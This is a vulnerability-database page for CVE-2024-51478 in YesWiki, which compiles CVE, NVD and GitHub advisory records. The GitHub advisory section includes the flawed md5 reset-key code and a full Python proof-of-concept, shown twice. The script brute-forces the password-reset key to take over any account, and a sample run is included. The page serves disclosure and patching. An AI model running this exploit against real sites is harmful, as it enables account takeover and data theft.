Vulnerability-Lookup

CVE-2024-51478 (GCVE-0-2024-51478)

Vulnerability from cvelistv5 – Published: 2024-10-31 16:15 – Updated: 2024-10-31 16:51

Title

Use of a Broken or Risky Cryptographic Algorithm in YesWiki

Summary

YesWiki is a wiki system written in PHP. Prior to 4.4.5, the use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account. This issue is fixed in 4.4.5.

Severity

9.9 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

CWE

CWE-327 - Use of a Broken or Risky Cryptographic Algorithm

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/YesWiki/yeswiki/security/advis…	x_refsource_CONFIRM
https://github.com/YesWiki/yeswiki/commit/b5a8f93…	x_refsource_MISC
https://github.com/YesWiki/yeswiki/commit/e128570…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
YesWiki	yeswiki	Affected: < 4.4.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:yeswiki:yeswiki:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "yeswiki",
            "vendor": "yeswiki",
            "versions": [
              {
                "lessThan": "4.4.5",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-51478",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-31T16:50:17.636181Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-31T16:51:13.578Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "yeswiki",
          "vendor": "YesWiki",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.4.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "YesWiki is a wiki system written in PHP. Prior to 4.4.5, the use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account. This issue is fixed in 4.4.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-327",
              "description": "CWE-327: Use of a Broken or Risky Cryptographic Algorithm",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-10-31T16:15:46.811Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3"
        },
        {
          "name": "https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc"
        },
        {
          "name": "https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7"
        }
      ],
      "source": {
        "advisory": "GHSA-4fvx-h823-38v3",
        "discovery": "UNKNOWN"
      },
      "title": "Use of a Broken or Risky Cryptographic Algorithm in YesWiki"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-51478",
    "datePublished": "2024-10-31T16:15:46.811Z",
    "dateReserved": "2024-10-28T14:20:59.335Z",
    "dateUpdated": "2024-10-31T16:51:13.578Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2024-51478",
      "date": "2026-05-30",
      "epss": "0.00157",
      "percentile": "0.36187"
    },
    "fkie_nvd": {
      "descriptions": "[{\"lang\": \"en\", \"value\": \"YesWiki is a wiki system written in PHP. Prior to 4.4.5, the use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account. This issue is fixed in 4.4.5.\"}, {\"lang\": \"es\", \"value\": \"YesWiki es un sistema wiki escrito en PHP. Antes de la versi\\u00f3n 4.4.5, el uso de un algoritmo criptogr\\u00e1fico d\\u00e9bil y una sal codificada de forma r\\u00edgida para codificar la clave de restablecimiento de contrase\\u00f1a permite recuperarla y usarla para restablecer la contrase\\u00f1a de cualquier cuenta. Este problema se solucion\\u00f3 en la versi\\u00f3n 4.4.5.\"}]",
      "id": "CVE-2024-51478",
      "lastModified": "2024-11-01T12:57:03.417",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\", \"baseScore\": 9.9, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.3}]}",
      "published": "2024-10-31T17:15:13.500",
      "references": "[{\"url\": \"https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3\", \"source\": \"security-advisories@github.com\"}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Awaiting Analysis",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-327\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-51478\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-10-31T17:15:13.500\",\"lastModified\":\"2025-05-09T14:06:43.383\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"YesWiki is a wiki system written in PHP. Prior to 4.4.5, the use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account. This issue is fixed in 4.4.5.\"},{\"lang\":\"es\",\"value\":\"YesWiki es un sistema wiki escrito en PHP. Antes de la versi\u00f3n 4.4.5, el uso de un algoritmo criptogr\u00e1fico d\u00e9bil y una sal codificada de forma r\u00edgida para codificar la clave de restablecimiento de contrase\u00f1a permite recuperarla y usarla para restablecer la contrase\u00f1a de cualquier cuenta. Este problema se solucion\u00f3 en la versi\u00f3n 4.4.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":5.3},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-327\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.4.5\",\"matchCriteriaId\":\"D808E4D0-17A9-4B24-8FA1-50DEE8D51E8B\"}]}]}],\"references\":[{\"url\":\"https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Use of a Broken or Risky Cryptographic Algorithm in YesWiki\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-327\", \"lang\": \"en\", \"description\": \"CWE-327: Use of a Broken or Risky Cryptographic Algorithm\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"LOW\", \"baseScore\": 9.9, \"baseSeverity\": \"CRITICAL\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"scope\": \"CHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3\"}, {\"name\": \"https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc\"}, {\"name\": \"https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7\"}], \"affected\": [{\"vendor\": \"YesWiki\", \"product\": \"yeswiki\", \"versions\": [{\"version\": \"\u003c 4.4.5\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-10-31T16:15:46.811Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"YesWiki is a wiki system written in PHP. Prior to 4.4.5, the use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account. This issue is fixed in 4.4.5.\"}], \"source\": {\"advisory\": \"GHSA-4fvx-h823-38v3\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-51478\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-10-31T16:50:17.636181Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:yeswiki:yeswiki:-:*:*:*:*:*:*:*\"], \"vendor\": \"yeswiki\", \"product\": \"yeswiki\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"4.4.5\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-10-31T16:51:07.402Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-51478\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2024-10-28T14:20:59.335Z\", \"datePublished\": \"2024-10-31T16:15:46.811Z\", \"dateUpdated\": \"2024-10-31T16:51:13.578Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2024-51478

Vulnerability from fkie_nvd - Published: 2024-10-31 17:15 - Updated: 2025-05-09 14:06

Severity

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc	Patch
security-advisories@github.com	https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7	Patch
security-advisories@github.com	https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	yeswiki	yeswiki	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D808E4D0-17A9-4B24-8FA1-50DEE8D51E8B",
              "versionEndExcluding": "4.4.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "YesWiki is a wiki system written in PHP. Prior to 4.4.5, the use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account. This issue is fixed in 4.4.5."
    },
    {
      "lang": "es",
      "value": "YesWiki es un sistema wiki escrito en PHP. Antes de la versi\u00f3n 4.4.5, el uso de un algoritmo criptogr\u00e1fico d\u00e9bil y una sal codificada de forma r\u00edgida para codificar la clave de restablecimiento de contrase\u00f1a permite recuperarla y usarla para restablecer la contrase\u00f1a de cualquier cuenta. Este problema se solucion\u00f3 en la versi\u00f3n 4.4.5."
    }
  ],
  "id": "CVE-2024-51478",
  "lastModified": "2025-05-09T14:06:43.383",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.3,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-10-31T17:15:13.500",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-327"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-4FVX-H823-38V3

Vulnerability from github – Published: 2024-10-31 17:12 – Updated: 2024-10-31 19:36

Summary

YesWiki Uses a Broken or Risky Cryptographic Algorithm

Details

Summary

The use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account.

Details

Firstly, the salt used to hash the password reset key is hard-coded in the includes/services/UserManager.php file at line 36 :

private const PW_SALT = 'FBcA';

Next, the application uses a weak cryptographic algorithm to hash the password reset key. The hash algorithm is defined in the includes/services/UserManager.php file at line 201 :

protected function generateUserLink($user)
{
    // Generate the password recovery key
    $key = md5($user['name'] . '_' . $user['email'] . random_int(0, 10000) . date('Y-m-d H:i:s') . self::PW_SALT);

The key is generated from the user's name, e-mail address, a random number between 0 and 10000, the current date of the request and the salt. If we know the user's name and e-mail address, we can retrieve the key and use it to reset the account password with a bit of brute force on the random number.

Proof of Concept (PoC)

To demonstrate the vulnerability, I created a python script to automatically retrieve the key and reset the password of a provided username and email.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Nishacid
# YesWiki <= 4.4.4 Account Takeover via Weak Password Reset Crypto

from hashlib import md5
from requests import post, get
from base64 import b64encode
from sys import exit
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from argparse import ArgumentParser

# Known data
salt = 'FBcA' # Hardcoded salt 
random_range = 10000  # Range for random_int()
WORKERS = 20 # Number of workers

# Arguments
def parseArgs():
    parser = ArgumentParser()
    parser.add_argument("-u", "--username", dest="username", default=None, help="Username of the account", required=True)
    parser.add_argument("-e", "--email", dest="email", default=None, help="Email of the account", required=True)
    parser.add_argument("-d", "--domain", dest="domain", default=None, help="Domain of the target", required=True)
    return parser.parse_args()

# Reset password request and get timestamp  
def reset_password(email: str, domain: str):
    response = post(
        f'{domain}?MotDePassePerdu',
        data={
            'email': email, 
            'subStep': '1'
        },
        headers={
            'Content-Type': 'application/x-www-form-urlencoded'
        }
    )
    if response.ok:
        timestamp = datetime.now() # obtain the timestamp
        timestamp = timestamp.strftime('%Y-%m-%d %H:%M:%S')
        print(f"[*] Requesting link for {email} at {timestamp}")
        return timestamp
    else:
        print("[-] Error while resetting password.")
        exit()

# Generate and check keys
def check_key(random_int_val: int, timestamp_req: str, domain: str, username: str, email: str):
    user_base64 = b64encode(username.encode()).decode()
    data = f"{username}_{email}{random_int_val}{timestamp_req}{salt}"
    hash_candidate = md5(data.encode()).hexdigest()
    url = f"{domain}?MotDePassePerdu&a=recover&email={hash_candidate}&u={user_base64}"
    # print(f"[*] Checking {url}")
    response = get(url)

    # Check if the link is valid, warning depending on the language
    if '<strong>Bienvenu.e' in response.text or '<strong>Welcome' in response.text:
        return (True, random_int_val, hash_candidate, url)
    return (False, random_int_val, None, None)

def main(timestamp_req: str, domain: str, username: str, email: str):
    # Launch the brute-force
    print(f"[*] Starting brute-force, it can take few minutes...")
    with ThreadPoolExecutor(max_workers=WORKERS) as executor:
        futures = [executor.submit(check_key, i, timestamp_req, domain, username, email) for i in range(random_range + 1)]

        for future in as_completed(futures):
            success, random_int_val, hash_candidate, url = future.result()
            if success:
                print(f"[+] Key found ! random_int: {random_int_val}, hash: {hash_candidate}")
                print(f"[+] URL: {url}")
                exit()
        else:
            print("[-] Key not found.")

if __name__ == "__main__":
    args = parseArgs()
    timestamp_req = reset_password(args.email, args.domain)
    main(timestamp_req, args.domain, args.username, args.email)

Simply run this script with the arguments -u for the username, -e for the email and -d for the target domain.

» python3 expoit.py --username 'admin' --email 'admin@nishacid.local' --domain 'http://localhost/' 
[*] Requesting link for admin@nishacid.local at 2024-10-30 10:46:48
[*] Starting brute-force, it can take few minutes...
[+] Key found ! random_int: 9264, hash: 22a2751f50ba74b259818394d34020c9
[+] URL: http://localhost/?MotDePassePerdu&a=recover&email=22a2751f50ba74b259818394d34020c9&u=YWRtaW4K

Impact

Many impacts are possible, the most obvious being account takeover, which can lead to theft of sensitive data, modification of website content, addition/deletion of administrator accounts, user identity theft, etc.

Recommendation

The safest solution is to replace the salt with a random one and the hash algorithm with a more secure one. For example, you can use random bytes instead of a random integer.

Severity

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L

7.8 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.4.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "yeswiki/yeswiki"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-51478"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-327"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-31T17:12:35Z",
    "nvd_published_at": "2024-10-31T17:15:13Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe use of a weak cryptographic algorithm and a hard-coded salt to hash the password reset key allows it to be recovered and used to reset the password of any account.\n\n### Details\nFirstly, the salt used to hash the password reset key is hard-coded in the `includes/services/UserManager.php` file at line `36` :\n\n```php\nprivate const PW_SALT = \u0027FBcA\u0027;\n```\n\nNext, the application uses a weak cryptographic algorithm to hash the password reset key. The hash algorithm is defined in the `includes/services/UserManager.php` file at line `201` :\n\n```php\nprotected function generateUserLink($user)\n{\n    // Generate the password recovery key\n    $key = md5($user[\u0027name\u0027] . \u0027_\u0027 . $user[\u0027email\u0027] . random_int(0, 10000) . date(\u0027Y-m-d H:i:s\u0027) . self::PW_SALT);\n```\n\nThe key is generated from the **user\u0027s name**, **e-mail address**, a random number **between 0 and 10000**, the **current date** of the request and the **salt**.\nIf we know the user\u0027s name and e-mail address, we can retrieve the key and use it to reset the account password with a bit of brute force on the random number.\n\n### Proof of Concept (PoC)\nTo demonstrate the vulnerability, I created a python script to automatically retrieve the key and reset the password of a provided username and email.\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: Nishacid\n# YesWiki \u003c= 4.4.4 Account Takeover via Weak Password Reset Crypto\n\nfrom hashlib import md5\nfrom requests import post, get\nfrom base64 import b64encode\nfrom sys import exit\nfrom datetime import datetime\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom argparse import ArgumentParser\n\n# Known data\nsalt = \u0027FBcA\u0027 # Hardcoded salt \nrandom_range = 10000  # Range for random_int()\nWORKERS = 20 # Number of workers\n\n# Arguments\ndef parseArgs():\n    parser = ArgumentParser()\n    parser.add_argument(\"-u\", \"--username\", dest=\"username\", default=None, help=\"Username of the account\", required=True)\n    parser.add_argument(\"-e\", \"--email\", dest=\"email\", default=None, help=\"Email of the account\", required=True)\n    parser.add_argument(\"-d\", \"--domain\", dest=\"domain\", default=None, help=\"Domain of the target\", required=True)\n    return parser.parse_args()\n\n# Reset password request and get timestamp  \ndef reset_password(email: str, domain: str):\n    response = post(\n        f\u0027{domain}?MotDePassePerdu\u0027,\n        data={\n            \u0027email\u0027: email, \n            \u0027subStep\u0027: \u00271\u0027\n        },\n        headers={\n            \u0027Content-Type\u0027: \u0027application/x-www-form-urlencoded\u0027\n        }\n    )\n    if response.ok:\n        timestamp = datetime.now() # obtain the timestamp\n        timestamp = timestamp.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)\n        print(f\"[*] Requesting link for {email} at {timestamp}\")\n        return timestamp\n    else:\n        print(\"[-] Error while resetting password.\")\n        exit()\n\n# Generate and check keys\ndef check_key(random_int_val: int, timestamp_req: str, domain: str, username: str, email: str):\n    user_base64 = b64encode(username.encode()).decode()\n    data = f\"{username}_{email}{random_int_val}{timestamp_req}{salt}\"\n    hash_candidate = md5(data.encode()).hexdigest()\n    url = f\"{domain}?MotDePassePerdu\u0026a=recover\u0026email={hash_candidate}\u0026u={user_base64}\"\n    # print(f\"[*] Checking {url}\")\n    response = get(url)\n    \n    # Check if the link is valid, warning depending on the language\n    if \u0027\u003cstrong\u003eBienvenu.e\u0027 in response.text or \u0027\u003cstrong\u003eWelcome\u0027 in response.text:\n        return (True, random_int_val, hash_candidate, url)\n    return (False, random_int_val, None, None)\n\ndef main(timestamp_req: str, domain: str, username: str, email: str):\n    # Launch the brute-force\n    print(f\"[*] Starting brute-force, it can take few minutes...\")\n    with ThreadPoolExecutor(max_workers=WORKERS) as executor:\n        futures = [executor.submit(check_key, i, timestamp_req, domain, username, email) for i in range(random_range + 1)]\n        \n        for future in as_completed(futures):\n            success, random_int_val, hash_candidate, url = future.result()\n            if success:\n                print(f\"[+] Key found ! random_int: {random_int_val}, hash: {hash_candidate}\")\n                print(f\"[+] URL: {url}\")\n                exit()\n        else:\n            print(\"[-] Key not found.\")\n\nif __name__ == \"__main__\":\n    args = parseArgs()\n    timestamp_req = reset_password(args.email, args.domain)\n    main(timestamp_req, args.domain, args.username, args.email)\n```\n\nSimply run this script with the arguments `-u` for the username, `-e` for the email and `-d` for the target domain.\n\n```bash\n\u00bb python3 expoit.py --username \u0027admin\u0027 --email \u0027admin@nishacid.local\u0027 --domain \u0027http://localhost/\u0027 \n[*] Requesting link for admin@nishacid.local at 2024-10-30 10:46:48\n[*] Starting brute-force, it can take few minutes...\n[+] Key found ! random_int: 9264, hash: 22a2751f50ba74b259818394d34020c9\n[+] URL: http://localhost/?MotDePassePerdu\u0026a=recover\u0026email=22a2751f50ba74b259818394d34020c9\u0026u=YWRtaW4K\n```\n\n### Impact\nMany impacts are possible, the most obvious being account takeover, which can lead to theft of sensitive data, modification of website content, addition/deletion of administrator accounts, user identity theft, etc.\n\n### Recommendation \nThe safest solution is to replace the salt with a random one and the hash algorithm with a more secure one.\nFor example, you can use [random bytes](https://www.php.net/manual/en/function.random-bytes.php) instead of a random integer.",
  "id": "GHSA-4fvx-h823-38v3",
  "modified": "2024-10-31T19:36:27Z",
  "published": "2024-10-31T17:12:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-4fvx-h823-38v3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51478"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/commit/b5a8f93b87720d5d5f033a4b3a131ce0fb621dbc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/commit/e1285709f6f6a2277bd0075acf369f33cefd78f7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YesWiki/yeswiki"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "YesWiki Uses a Broken or Risky Cryptographic Algorithm"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
